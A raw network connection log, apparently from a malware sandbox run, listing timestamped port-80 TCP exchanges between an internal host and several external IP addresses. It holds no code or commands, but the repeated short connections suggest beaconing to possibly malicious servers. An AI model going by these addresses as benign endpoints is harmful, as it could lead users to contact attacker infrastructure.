                                                                            Dec 3, 2024 18:57:53.401163101 CET4979580192.168.11.20104.21.57.248
                                                                            Dec 3, 2024 18:57:53.404745102 CET4979580192.168.11.20104.21.57.248
                                                                            Dec 3, 2024 18:57:53.530544996 CET8049795104.21.57.248192.168.11.20
                                                                            Dec 3, 2024 18:57:53.924298048 CET8049795104.21.57.248192.168.11.20
                                                                            Dec 3, 2024 18:57:53.924343109 CET8049795104.21.57.248192.168.11.20
                                                                            Dec 3, 2024 18:57:53.924376965 CET8049795104.21.57.248192.168.11.20
                                                                            Dec 3, 2024 18:57:53.924561024 CET4979580192.168.11.20104.21.57.248
                                                                            Dec 3, 2024 18:57:53.924746037 CET8049795104.21.57.248192.168.11.20
                                                                            Dec 3, 2024 18:57:53.924928904 CET4979580192.168.11.20104.21.57.248
                                                                            Dec 3, 2024 18:57:54.914513111 CET4979580192.168.11.20104.21.57.248
                                                                            Dec 3, 2024 18:57:55.930696964 CET4979680192.168.11.20104.21.57.248
                                                                            Dec 3, 2024 18:57:56.056838036 CET8049796104.21.57.248192.168.11.20
                                                                            Dec 3, 2024 18:57:56.057008982 CET4979680192.168.11.20104.21.57.248
                                                                            Dec 3, 2024 18:57:56.060842991 CET4979680192.168.11.20104.21.57.248
                                                                            Dec 3, 2024 18:57:56.060902119 CET4979680192.168.11.20104.21.57.248
                                                                            Dec 3, 2024 18:57:56.060959101 CET4979680192.168.11.20104.21.57.248
                                                                            Dec 3, 2024 18:57:56.186902046 CET8049796104.21.57.248192.168.11.20
                                                                            Dec 3, 2024 18:57:56.187047005 CET8049796104.21.57.248192.168.11.20
                                                                            Dec 3, 2024 18:57:56.187371969 CET8049796104.21.57.248192.168.11.20
                                                                            Dec 3, 2024 18:57:56.613667965 CET8049796104.21.57.248192.168.11.20
                                                                            Dec 3, 2024 18:57:56.613677979 CET8049796104.21.57.248192.168.11.20
                                                                            Dec 3, 2024 18:57:56.613862991 CET4979680192.168.11.20104.21.57.248
                                                                            Dec 3, 2024 18:57:56.614345074 CET8049796104.21.57.248192.168.11.20
                                                                            Dec 3, 2024 18:57:56.614540100 CET4979680192.168.11.20104.21.57.248
                                                                            Dec 3, 2024 18:57:57.570171118 CET4979680192.168.11.20104.21.57.248
                                                                            Dec 3, 2024 18:57:58.586389065 CET4979780192.168.11.20104.21.57.248
                                                                            Dec 3, 2024 18:57:58.712881088 CET8049797104.21.57.248192.168.11.20
                                                                            Dec 3, 2024 18:57:58.713156939 CET4979780192.168.11.20104.21.57.248
                                                                            Dec 3, 2024 18:57:58.715545893 CET4979780192.168.11.20104.21.57.248
                                                                            Dec 3, 2024 18:57:58.841934919 CET8049797104.21.57.248192.168.11.20
                                                                            Dec 3, 2024 18:57:59.220752001 CET8049797104.21.57.248192.168.11.20
                                                                            Dec 3, 2024 18:57:59.220797062 CET8049797104.21.57.248192.168.11.20
                                                                            Dec 3, 2024 18:57:59.221096039 CET4979780192.168.11.20104.21.57.248
                                                                            Dec 3, 2024 18:57:59.221345901 CET8049797104.21.57.248192.168.11.20
                                                                            Dec 3, 2024 18:57:59.221565008 CET4979780192.168.11.20104.21.57.248
                                                                            Dec 3, 2024 18:57:59.222258091 CET4979780192.168.11.20104.21.57.248
                                                                            Dec 3, 2024 18:57:59.348587036 CET8049797104.21.57.248192.168.11.20
                                                                            Dec 3, 2024 18:58:04.593969107 CET4979880192.168.11.2074.48.143.82
                                                                            Dec 3, 2024 18:58:04.782093048 CET804979874.48.143.82192.168.11.20
                                                                            Dec 3, 2024 18:58:04.782417059 CET4979880192.168.11.2074.48.143.82
                                                                            Dec 3, 2024 18:58:04.785938978 CET4979880192.168.11.2074.48.143.82
                                                                            Dec 3, 2024 18:58:04.973994017 CET804979874.48.143.82192.168.11.20
                                                                            Dec 3, 2024 18:58:04.994240999 CET804979874.48.143.82192.168.11.20
                                                                            Dec 3, 2024 18:58:04.994303942 CET804979874.48.143.82192.168.11.20
                                                                            Dec 3, 2024 18:58:04.994338989 CET804979874.48.143.82192.168.11.20
                                                                            Dec 3, 2024 18:58:04.994519949 CET4979880192.168.11.2074.48.143.82
                                                                            Dec 3, 2024 18:58:06.287014008 CET4979880192.168.11.2074.48.143.82
                                                                            Dec 3, 2024 18:58:07.303225994 CET4979980192.168.11.2074.48.143.82
                                                                            Dec 3, 2024 18:58:07.492161989 CET804979974.48.143.82192.168.11.20
                                                                            Dec 3, 2024 18:58:07.492470026 CET4979980192.168.11.2074.48.143.82
                                                                            Dec 3, 2024 18:58:07.500086069 CET4979980192.168.11.2074.48.143.82
                                                                            Dec 3, 2024 18:58:07.689697027 CET804979974.48.143.82192.168.11.20
                                                                            Dec 3, 2024 18:58:07.690882921 CET804979974.48.143.82192.168.11.20
                                                                            Dec 3, 2024 18:58:07.691257954 CET804979974.48.143.82192.168.11.20
                                                                            Dec 3, 2024 18:58:07.691262007 CET804979974.48.143.82192.168.11.20
                                                                            Dec 3, 2024 18:58:07.692390919 CET4979980192.168.11.2074.48.143.82
                                                                            Dec 3, 2024 18:58:09.005191088 CET4979980192.168.11.2074.48.143.82
                                                                            Dec 3, 2024 18:58:10.021338940 CET4980080192.168.11.2074.48.143.82
                                                                            Dec 3, 2024 18:58:10.209114075 CET804980074.48.143.82192.168.11.20
                                                                            Dec 3, 2024 18:58:10.209269047 CET4980080192.168.11.2074.48.143.82
                                                                            Dec 3, 2024 18:58:10.212886095 CET4980080192.168.11.2074.48.143.82
                                                                            Dec 3, 2024 18:58:10.213011026 CET4980080192.168.11.2074.48.143.82
                                                                            Dec 3, 2024 18:58:10.400862932 CET804980074.48.143.82192.168.11.20
                                                                            Dec 3, 2024 18:58:10.400937080 CET804980074.48.143.82192.168.11.20
                                                                            Dec 3, 2024 18:58:10.401246071 CET804980074.48.143.82192.168.11.20
                                                                            Dec 3, 2024 18:58:10.401295900 CET804980074.48.143.82192.168.11.20
                                                                            Dec 3, 2024 18:58:10.401407003 CET804980074.48.143.82192.168.11.20
                                                                            Dec 3, 2024 18:58:10.401441097 CET804980074.48.143.82192.168.11.20
                                                                            Dec 3, 2024 18:58:10.401520967 CET4980080192.168.11.2074.48.143.82
                                                                            Dec 3, 2024 18:58:10.589611053 CET804980074.48.143.82192.168.11.20
                                                                            Dec 3, 2024 18:58:12.739504099 CET4980180192.168.11.2074.48.143.82
                                                                            Dec 3, 2024 18:58:12.928325891 CET804980174.48.143.82192.168.11.20
                                                                            Dec 3, 2024 18:58:12.928524017 CET4980180192.168.11.2074.48.143.82
                                                                            Dec 3, 2024 18:58:12.930947065 CET4980180192.168.11.2074.48.143.82
                                                                            Dec 3, 2024 18:58:13.119584084 CET804980174.48.143.82192.168.11.20
                                                                            Dec 3, 2024 18:58:13.119966984 CET804980174.48.143.82192.168.11.20
                                                                            Dec 3, 2024 18:58:13.119992018 CET804980174.48.143.82192.168.11.20
                                                                            Dec 3, 2024 18:58:13.120168924 CET804980174.48.143.82192.168.11.20
                                                                            Dec 3, 2024 18:58:13.120260954 CET4980180192.168.11.2074.48.143.82
                                                                            Dec 3, 2024 18:58:13.120363951 CET4980180192.168.11.2074.48.143.82
                                                                            Dec 3, 2024 18:58:13.120938063 CET4980180192.168.11.2074.48.143.82
                                                                            Dec 3, 2024 18:58:13.309295893 CET804980174.48.143.82192.168.11.20
                                                                            Dec 3, 2024 18:58:44.072340012 CET4980680192.168.11.20202.92.5.23
                                                                            Dec 3, 2024 18:58:44.445893049 CET8049806202.92.5.23192.168.11.20
                                                                            Dec 3, 2024 18:58:44.446127892 CET4980680192.168.11.20202.92.5.23
                                                                            Dec 3, 2024 18:58:44.448559046 CET4980680192.168.11.20202.92.5.23
                                                                            Dec 3, 2024 18:58:44.821897030 CET8049806202.92.5.23192.168.11.20
                                                                            Dec 3, 2024 18:58:44.822220087 CET8049806202.92.5.23192.168.11.20
                                                                            Dec 3, 2024 18:58:44.822318077 CET8049806202.92.5.23192.168.11.20
                                                                            Dec 3, 2024 18:58:44.822355032 CET8049806202.92.5.23192.168.11.20
                                                                            Dec 3, 2024 18:58:44.822679996 CET4980680192.168.11.20202.92.5.23
                                                                            Dec 3, 2024 18:58:44.823317051 CET4980680192.168.11.20202.92.5.23
                                                                            Dec 3, 2024 18:58:45.196387053 CET8049806202.92.5.23192.168.11.20
                                                                            Dec 3, 2024 18:58:49.825159073 CET4980780192.168.11.2013.248.169.48
                                                                            Dec 3, 2024 18:58:49.979548931 CET804980713.248.169.48192.168.11.20
                                                                            Dec 3, 2024 18:58:49.979901075 CET4980780192.168.11.2013.248.169.48
                                                                            Dec 3, 2024 18:58:49.983441114 CET4980780192.168.11.2013.248.169.48
                                                                            Dec 3, 2024 18:58:50.135910988 CET804980713.248.169.48192.168.11.20
                                                                            Dec 3, 2024 18:58:50.141114950 CET804980713.248.169.48192.168.11.20
                                                                            Dec 3, 2024 18:58:50.141283035 CET4980780192.168.11.2013.248.169.48
                                                                            Dec 3, 2024 18:58:51.495863914 CET4980780192.168.11.2013.248.169.48
                                                                            Dec 3, 2024 18:58:51.648638964 CET804980713.248.169.48192.168.11.20
                                                                            Dec 3, 2024 18:58:52.512048960 CET4980880192.168.11.2013.248.169.48
                                                                            Dec 3, 2024 18:58:52.665218115 CET804980813.248.169.48192.168.11.20
                                                                            Dec 3, 2024 18:58:52.665527105 CET4980880192.168.11.2013.248.169.48
                                                                            Dec 3, 2024 18:58:52.669116974 CET4980880192.168.11.2013.248.169.48
                                                                            Dec 3, 2024 18:58:52.821269989 CET804980813.248.169.48192.168.11.20
                                                                            Dec 3, 2024 18:58:52.821348906 CET804980813.248.169.48192.168.11.20
                                                                            Dec 3, 2024 18:58:52.821549892 CET4980880192.168.11.2013.248.169.48
                                                                            Dec 3, 2024 18:58:54.182749033 CET4980880192.168.11.2013.248.169.48
                                                                            Dec 3, 2024 18:58:54.334810019 CET804980813.248.169.48192.168.11.20
                                                                            Dec 3, 2024 18:58:55.198930025 CET4980980192.168.11.2013.248.169.48
                                                                            Dec 3, 2024 18:58:55.354604959 CET804980913.248.169.48192.168.11.20
                                                                            Dec 3, 2024 18:58:55.354831934 CET4980980192.168.11.2013.248.169.48
                                                                            Dec 3, 2024 18:58:55.358460903 CET4980980192.168.11.2013.248.169.48
                                                                            Dec 3, 2024 18:58:55.358531952 CET4980980192.168.11.2013.248.169.48
                                                                            Dec 3, 2024 18:58:55.513180017 CET804980913.248.169.48192.168.11.20
                                                                            Dec 3, 2024 18:58:55.513375998 CET804980913.248.169.48192.168.11.20
                                                                            Dec 3, 2024 18:58:55.513412952 CET804980913.248.169.48192.168.11.20
                                                                            Dec 3, 2024 18:58:55.513614893 CET804980913.248.169.48192.168.11.20
                                                                            Dec 3, 2024 18:58:55.513652086 CET804980913.248.169.48192.168.11.20
                                                                            Dec 3, 2024 18:58:55.513675928 CET804980913.248.169.48192.168.11.20
                                                                            Dec 3, 2024 18:58:57.885839939 CET4981080192.168.11.2013.248.169.48
                                                                            Dec 3, 2024 18:58:58.044049025 CET804981013.248.169.48192.168.11.20
                                                                            Dec 3, 2024 18:58:58.044770002 CET4981080192.168.11.2013.248.169.48
                                                                            Dec 3, 2024 18:58:58.047234058 CET4981080192.168.11.2013.248.169.48
                                                                            Dec 3, 2024 18:58:58.204336882 CET804981013.248.169.48192.168.11.20
                                                                            Dec 3, 2024 18:58:58.206229925 CET804981013.248.169.48192.168.11.20
                                                                            Dec 3, 2024 18:58:58.206294060 CET804981013.248.169.48192.168.11.20
                                                                            Dec 3, 2024 18:58:58.206605911 CET4981080192.168.11.2013.248.169.48
                                                                            Dec 3, 2024 18:58:58.207321882 CET4981080192.168.11.2013.248.169.48
                                                                            Dec 3, 2024 18:58:58.364492893 CET804981013.248.169.48192.168.11.20
                                                                            Dec 3, 2024 18:59:03.212795973 CET4981180192.168.11.20209.74.77.109
                                                                            Dec 3, 2024 18:59:03.401417971 CET8049811209.74.77.109192.168.11.20
                                                                            Dec 3, 2024 18:59:03.401626110 CET4981180192.168.11.20209.74.77.109
                                                                            Dec 3, 2024 18:59:03.405235052 CET4981180192.168.11.20209.74.77.109
                                                                            Dec 3, 2024 18:59:03.593600988 CET8049811209.74.77.109192.168.11.20
                                                                            Dec 3, 2024 18:59:03.599597931 CET8049811209.74.77.109192.168.11.20
                                                                            Dec 3, 2024 18:59:03.599643946 CET8049811209.74.77.109192.168.11.20
                                                                            Dec 3, 2024 18:59:03.599771976 CET4981180192.168.11.20209.74.77.109
                                                                            Dec 3, 2024 18:59:04.914810896 CET4981180192.168.11.20209.74.77.109
                                                                            Dec 3, 2024 18:59:05.931071043 CET4981280192.168.11.20209.74.77.109
                                                                            Dec 3, 2024 18:59:06.119241953 CET8049812209.74.77.109192.168.11.20
                                                                            Dec 3, 2024 18:59:06.119425058 CET4981280192.168.11.20209.74.77.109
                                                                            Dec 3, 2024 18:59:06.122956038 CET4981280192.168.11.20209.74.77.109
                                                                            Dec 3, 2024 18:59:06.311199903 CET8049812209.74.77.109192.168.11.20
                                                                            Dec 3, 2024 18:59:06.316783905 CET8049812209.74.77.109192.168.11.20
                                                                            Dec 3, 2024 18:59:06.316817999 CET8049812209.74.77.109192.168.11.20
                                                                            Dec 3, 2024 18:59:06.317034006 CET4981280192.168.11.20209.74.77.109
                                                                            Dec 3, 2024 18:59:07.633038998 CET4981280192.168.11.20209.74.77.109
                                                                            Dec 3, 2024 18:59:08.649099112 CET4981380192.168.11.20209.74.77.109
                                                                            Dec 3, 2024 18:59:08.837423086 CET8049813209.74.77.109192.168.11.20
                                                                            Dec 3, 2024 18:59:08.837629080 CET4981380192.168.11.20209.74.77.109
                                                                            Dec 3, 2024 18:59:08.841231108 CET4981380192.168.11.20209.74.77.109
                                                                            Dec 3, 2024 18:59:08.841308117 CET4981380192.168.11.20209.74.77.109
                                                                            Dec 3, 2024 18:59:09.029444933 CET8049813209.74.77.109192.168.11.20
                                                                            Dec 3, 2024 18:59:09.029488087 CET8049813209.74.77.109192.168.11.20
                                                                            Dec 3, 2024 18:59:09.029519081 CET8049813209.74.77.109192.168.11.20
                                                                            Dec 3, 2024 18:59:09.029805899 CET8049813209.74.77.109192.168.11.20
                                                                            Dec 3, 2024 18:59:09.030055046 CET8049813209.74.77.109192.168.11.20
                                                                            Dec 3, 2024 18:59:09.041454077 CET8049813209.74.77.109192.168.11.20
                                                                            Dec 3, 2024 18:59:09.041500092 CET8049813209.74.77.109192.168.11.20
                                                                            Dec 3, 2024 18:59:09.041640043 CET4981380192.168.11.20209.74.77.109
                                                                            Dec 3, 2024 18:59:10.351169109 CET4981380192.168.11.20209.74.77.109
                                                                            Dec 3, 2024 18:59:11.367276907 CET4981480192.168.11.20209.74.77.109
                                                                            Dec 3, 2024 18:59:11.555687904 CET8049814209.74.77.109192.168.11.20
                                                                            Dec 3, 2024 18:59:11.555941105 CET4981480192.168.11.20209.74.77.109
                                                                            Dec 3, 2024 18:59:11.558384895 CET4981480192.168.11.20209.74.77.109
                                                                            Dec 3, 2024 18:59:11.746654987 CET8049814209.74.77.109192.168.11.20
                                                                            Dec 3, 2024 18:59:11.752849102 CET8049814209.74.77.109192.168.11.20
                                                                            Dec 3, 2024 18:59:11.752897024 CET8049814209.74.77.109192.168.11.20
                                                                            Dec 3, 2024 18:59:11.753181934 CET4981480192.168.11.20209.74.77.109
                                                                            Dec 3, 2024 18:59:11.753880978 CET4981480192.168.11.20209.74.77.109
                                                                            Dec 3, 2024 18:59:11.942058086 CET8049814209.74.77.109192.168.11.20
                                                                            Dec 3, 2024 18:59:16.756678104 CET4981580192.168.11.2023.225.159.42
                                                                            Dec 3, 2024 18:59:16.945909023 CET804981523.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:59:16.946154118 CET4981580192.168.11.2023.225.159.42
                                                                            Dec 3, 2024 18:59:16.949727058 CET4981580192.168.11.2023.225.159.42
                                                                            Dec 3, 2024 18:59:17.135812044 CET804981523.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:59:17.136059999 CET4981580192.168.11.2023.225.159.42
                                                                            Dec 3, 2024 18:59:17.138870001 CET804981523.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:59:17.325228930 CET804981523.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:59:17.325279951 CET804981523.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:59:17.325481892 CET4981580192.168.11.2023.225.159.42
                                                                            Dec 3, 2024 18:59:18.458698034 CET4981580192.168.11.2023.225.159.42
                                                                            Dec 3, 2024 18:59:19.474854946 CET4981680192.168.11.2023.225.159.42
                                                                            Dec 3, 2024 18:59:19.665148020 CET804981623.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:59:19.665415049 CET4981680192.168.11.2023.225.159.42
                                                                            Dec 3, 2024 18:59:19.668977022 CET4981680192.168.11.2023.225.159.42
                                                                            Dec 3, 2024 18:59:19.855665922 CET804981623.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:59:19.855923891 CET4981680192.168.11.2023.225.159.42
                                                                            Dec 3, 2024 18:59:19.858891964 CET804981623.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:59:20.046036005 CET804981623.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:59:20.046078920 CET804981623.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:59:20.046253920 CET4981680192.168.11.2023.225.159.42
                                                                            Dec 3, 2024 18:59:21.176790953 CET4981680192.168.11.2023.225.159.42
                                                                            Dec 3, 2024 18:59:22.192908049 CET4981780192.168.11.2023.225.159.42
                                                                            Dec 3, 2024 18:59:22.383539915 CET804981723.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:59:22.383729935 CET4981780192.168.11.2023.225.159.42
                                                                            Dec 3, 2024 18:59:22.387367964 CET4981780192.168.11.2023.225.159.42
                                                                            Dec 3, 2024 18:59:22.574327946 CET804981723.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:59:22.574650049 CET4981780192.168.11.2023.225.159.42
                                                                            Dec 3, 2024 18:59:22.574721098 CET4981780192.168.11.2023.225.159.42
                                                                            Dec 3, 2024 18:59:22.577737093 CET804981723.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:59:22.765356064 CET804981723.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:59:22.765400887 CET804981723.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:59:22.765575886 CET4981780192.168.11.2023.225.159.42
                                                                            Dec 3, 2024 18:59:22.765594959 CET804981723.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:59:22.765636921 CET804981723.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:59:22.955998898 CET804981723.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:59:24.911130905 CET4981880192.168.11.2023.225.159.42
                                                                            Dec 3, 2024 18:59:25.101541996 CET804981823.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:59:25.101735115 CET4981880192.168.11.2023.225.159.42
                                                                            Dec 3, 2024 18:59:25.104075909 CET4981880192.168.11.2023.225.159.42
                                                                            Dec 3, 2024 18:59:25.291847944 CET804981823.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:59:25.292212009 CET4981880192.168.11.2023.225.159.42
                                                                            Dec 3, 2024 18:59:25.294025898 CET804981823.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:59:25.482382059 CET804981823.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:59:25.482424974 CET804981823.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:59:25.482700109 CET4981880192.168.11.2023.225.159.42
                                                                            Dec 3, 2024 18:59:25.483298063 CET4981880192.168.11.2023.225.159.42
                                                                            Dec 3, 2024 18:59:25.673542976 CET804981823.225.159.42192.168.11.20
                                                                            Dec 3, 2024 18:59:30.488055944 CET4981980192.168.11.2046.30.211.38
                                                                            Dec 3, 2024 18:59:30.740991116 CET804981946.30.211.38192.168.11.20
                                                                            Dec 3, 2024 18:59:30.741247892 CET4981980192.168.11.2046.30.211.38
                                                                            Dec 3, 2024 18:59:30.744817019 CET4981980192.168.11.2046.30.211.38
                                                                            Dec 3, 2024 18:59:30.997859001 CET804981946.30.211.38192.168.11.20
                                                                            Dec 3, 2024 18:59:30.997912884 CET804981946.30.211.38192.168.11.20
                                                                            Dec 3, 2024 18:59:30.997951031 CET804981946.30.211.38192.168.11.20
                                                                            Dec 3, 2024 18:59:30.998157978 CET4981980192.168.11.2046.30.211.38
                                                                            Dec 3, 2024 18:59:32.252491951 CET4981980192.168.11.2046.30.211.38
                                                                            Dec 3, 2024 18:59:33.268650055 CET4982080192.168.11.2046.30.211.38
                                                                            Dec 3, 2024 18:59:33.507282972 CET804982046.30.211.38192.168.11.20
                                                                            Dec 3, 2024 18:59:33.507435083 CET4982080192.168.11.2046.30.211.38
                                                                            Dec 3, 2024 18:59:33.511087894 CET4982080192.168.11.2046.30.211.38
                                                                            Dec 3, 2024 18:59:33.749608994 CET804982046.30.211.38192.168.11.20
                                                                            Dec 3, 2024 18:59:33.749625921 CET804982046.30.211.38192.168.11.20
                                                                            Dec 3, 2024 18:59:33.749639034 CET804982046.30.211.38192.168.11.20
                                                                            Dec 3, 2024 18:59:33.749854088 CET4982080192.168.11.2046.30.211.38
                                                                            Dec 3, 2024 18:59:35.017469883 CET4982080192.168.11.2046.30.211.38
                                                                            Dec 3, 2024 18:59:36.033854961 CET4982180192.168.11.2046.30.211.38
                                                                            Dec 3, 2024 18:59:36.291268110 CET804982146.30.211.38192.168.11.20
                                                                            Dec 3, 2024 18:59:36.291513920 CET4982180192.168.11.2046.30.211.38
                                                                            Dec 3, 2024 18:59:36.295120001 CET4982180192.168.11.2046.30.211.38
                                                                            Dec 3, 2024 18:59:36.295198917 CET4982180192.168.11.2046.30.211.38
                                                                            Dec 3, 2024 18:59:36.547710896 CET804982146.30.211.38192.168.11.20
                                                                            Dec 3, 2024 18:59:36.547761917 CET804982146.30.211.38192.168.11.20
                                                                            Dec 3, 2024 18:59:36.547821999 CET804982146.30.211.38192.168.11.20
                                                                            Dec 3, 2024 18:59:36.548098087 CET804982146.30.211.38192.168.11.20
                                                                            Dec 3, 2024 18:59:36.548131943 CET804982146.30.211.38192.168.11.20
                                                                            Dec 3, 2024 18:59:36.548322916 CET4982180192.168.11.2046.30.211.38
                                                                            Dec 3, 2024 18:59:37.798135996 CET4982180192.168.11.2046.30.211.38
                                                                            Dec 3, 2024 18:59:38.814424038 CET4982280192.168.11.2046.30.211.38
                                                                            Dec 3, 2024 18:59:39.053522110 CET804982246.30.211.38192.168.11.20
                                                                            Dec 3, 2024 18:59:39.053857088 CET4982280192.168.11.2046.30.211.38
                                                                            Dec 3, 2024 18:59:39.056277990 CET4982280192.168.11.2046.30.211.38
                                                                            Dec 3, 2024 18:59:39.295298100 CET804982246.30.211.38192.168.11.20
                                                                            Dec 3, 2024 18:59:39.297710896 CET804982246.30.211.38192.168.11.20
                                                                            Dec 3, 2024 18:59:39.297751904 CET804982246.30.211.38192.168.11.20
                                                                            Dec 3, 2024 18:59:39.298041105 CET4982280192.168.11.2046.30.211.38
                                                                            Dec 3, 2024 18:59:39.298702955 CET4982280192.168.11.2046.30.211.38
                                                                            Dec 3, 2024 18:59:39.537633896 CET804982246.30.211.38192.168.11.20
                                                                            Dec 3, 2024 18:59:44.313164949 CET4982380192.168.11.20103.224.182.242
                                                                            Dec 3, 2024 18:59:44.500726938 CET8049823103.224.182.242192.168.11.20
                                                                            Dec 3, 2024 18:59:44.500956059 CET4982380192.168.11.20103.224.182.242
                                                                            Dec 3, 2024 18:59:44.504518032 CET4982380192.168.11.20103.224.182.242
                                                                            Dec 3, 2024 18:59:44.713715076 CET8049823103.224.182.242192.168.11.20
                                                                            Dec 3, 2024 18:59:44.713753939 CET8049823103.224.182.242192.168.11.20
                                                                            Dec 3, 2024 18:59:44.713906050 CET4982380192.168.11.20103.224.182.242
                                                                            Dec 3, 2024 18:59:46.015100002 CET4982380192.168.11.20103.224.182.242
                                                                            Dec 3, 2024 18:59:47.031234026 CET4982480192.168.11.20103.224.182.242
                                                                            Dec 3, 2024 18:59:47.218640089 CET8049824103.224.182.242192.168.11.20
                                                                            Dec 3, 2024 18:59:47.218895912 CET4982480192.168.11.20103.224.182.242
                                                                            Dec 3, 2024 18:59:47.222424030 CET4982480192.168.11.20103.224.182.242
                                                                            Dec 3, 2024 18:59:47.416393995 CET8049824103.224.182.242192.168.11.20
                                                                            Dec 3, 2024 18:59:47.416441917 CET8049824103.224.182.242192.168.11.20
                                                                            Dec 3, 2024 18:59:47.417193890 CET4982480192.168.11.20103.224.182.242
                                                                            Dec 3, 2024 18:59:48.733292103 CET4982480192.168.11.20103.224.182.242
                                                                            Dec 3, 2024 18:59:49.749418974 CET4982580192.168.11.20103.224.182.242
                                                                            Dec 3, 2024 18:59:49.936949968 CET8049825103.224.182.242192.168.11.20
                                                                            Dec 3, 2024 18:59:49.937128067 CET4982580192.168.11.20103.224.182.242
                                                                            Dec 3, 2024 18:59:49.940721035 CET4982580192.168.11.20103.224.182.242
                                                                            Dec 3, 2024 18:59:49.940784931 CET4982580192.168.11.20103.224.182.242
                                                                            Dec 3, 2024 18:59:49.940841913 CET4982580192.168.11.20103.224.182.242
                                                                            Dec 3, 2024 18:59:50.128292084 CET8049825103.224.182.242192.168.11.20
                                                                            Dec 3, 2024 18:59:50.128485918 CET8049825103.224.182.242192.168.11.20
                                                                            Dec 3, 2024 18:59:50.128528118 CET8049825103.224.182.242192.168.11.20
                                                                            Dec 3, 2024 18:59:50.128556967 CET8049825103.224.182.242192.168.11.20
                                                                            Dec 3, 2024 18:59:50.128834963 CET8049825103.224.182.242192.168.11.20
                                                                            Dec 3, 2024 18:59:50.135205984 CET8049825103.224.182.242192.168.11.20
                                                                            Dec 3, 2024 18:59:50.135253906 CET8049825103.224.182.242192.168.11.20
                                                                            Dec 3, 2024 18:59:50.135369062 CET4982580192.168.11.20103.224.182.242
                                                                            Dec 3, 2024 18:59:51.451503992 CET4982580192.168.11.20103.224.182.242
                                                                            Dec 3, 2024 18:59:52.467575073 CET4982680192.168.11.20103.224.182.242
                                                                            Dec 3, 2024 18:59:52.655143023 CET8049826103.224.182.242192.168.11.20
                                                                            Dec 3, 2024 18:59:52.655395985 CET4982680192.168.11.20103.224.182.242
                                                                            Dec 3, 2024 18:59:52.657898903 CET4982680192.168.11.20103.224.182.242
                                                                            Dec 3, 2024 18:59:52.856648922 CET8049826103.224.182.242192.168.11.20
                                                                            Dec 3, 2024 18:59:52.856698036 CET8049826103.224.182.242192.168.11.20
                                                                            Dec 3, 2024 18:59:52.856734037 CET8049826103.224.182.242192.168.11.20
                                                                            Dec 3, 2024 18:59:52.856997013 CET4982680192.168.11.20103.224.182.242
                                                                            Dec 3, 2024 18:59:52.856997967 CET4982680192.168.11.20103.224.182.242
                                                                            Dec 3, 2024 18:59:52.857630014 CET4982680192.168.11.20103.224.182.242
                                                                            Dec 3, 2024 18:59:53.045032978 CET8049826103.224.182.242192.168.11.20
                                                                            Dec 3, 2024 18:59:57.872698069 CET4982780192.168.11.20149.88.81.190
                                                                            Dec 3, 2024 18:59:58.209985018 CET8049827149.88.81.190192.168.11.20
                                                                            Dec 3, 2024 18:59:58.210197926 CET4982780192.168.11.20149.88.81.190
                                                                            Dec 3, 2024 18:59:58.213764906 CET4982780192.168.11.20149.88.81.190
                                                                            Dec 3, 2024 18:59:58.550756931 CET8049827149.88.81.190192.168.11.20
                                                                            Dec 3, 2024 18:59:58.550810099 CET8049827149.88.81.190192.168.11.20
                                                                            Dec 3, 2024 18:59:58.550843954 CET8049827149.88.81.190192.168.11.20
                                                                            Dec 3, 2024 18:59:58.551125050 CET4982780192.168.11.20149.88.81.190
                                                                            Dec 3, 2024 18:59:59.715239048 CET4982780192.168.11.20149.88.81.190
                                                                            Dec 3, 2024 19:00:00.731389999 CET4982880192.168.11.20149.88.81.190
                                                                            Dec 3, 2024 19:00:01.077233076 CET8049828149.88.81.190192.168.11.20
                                                                            Dec 3, 2024 19:00:01.077395916 CET4982880192.168.11.20149.88.81.190
                                                                            Dec 3, 2024 19:00:01.081337929 CET4982880192.168.11.20149.88.81.190
                                                                            Dec 3, 2024 19:00:01.416429043 CET8049828149.88.81.190192.168.11.20
                                                                            Dec 3, 2024 19:00:01.416487932 CET8049828149.88.81.190192.168.11.20
                                                                            Dec 3, 2024 19:00:01.416517019 CET8049828149.88.81.190192.168.11.20
                                                                            Dec 3, 2024 19:00:01.416649103 CET4982880192.168.11.20149.88.81.190
                                                                            Dec 3, 2024 19:00:02.589647055 CET4982880192.168.11.20149.88.81.190
                                                                            Dec 3, 2024 19:00:03.605746984 CET4982980192.168.11.20149.88.81.190
                                                                            Dec 3, 2024 19:00:03.944931030 CET8049829149.88.81.190192.168.11.20
                                                                            Dec 3, 2024 19:00:03.945144892 CET4982980192.168.11.20149.88.81.190
                                                                            Dec 3, 2024 19:00:03.948767900 CET4982980192.168.11.20149.88.81.190
                                                                            Dec 3, 2024 19:00:03.948832035 CET4982980192.168.11.20149.88.81.190
                                                                            Dec 3, 2024 19:00:03.948873997 CET4982980192.168.11.20149.88.81.190
                                                                            Dec 3, 2024 19:00:04.293603897 CET8049829149.88.81.190192.168.11.20
                                                                            Dec 3, 2024 19:00:04.296375036 CET8049829149.88.81.190192.168.11.20
                                                                            Dec 3, 2024 19:00:04.296411037 CET8049829149.88.81.190192.168.11.20
                                                                            Dec 3, 2024 19:00:04.296603918 CET8049829149.88.81.190192.168.11.20
                                                                            Dec 3, 2024 19:00:04.296648026 CET8049829149.88.81.190192.168.11.20
                                                                            Dec 3, 2024 19:00:04.296675920 CET8049829149.88.81.190192.168.11.20
                                                                            Dec 3, 2024 19:00:04.296823978 CET4982980192.168.11.20149.88.81.190
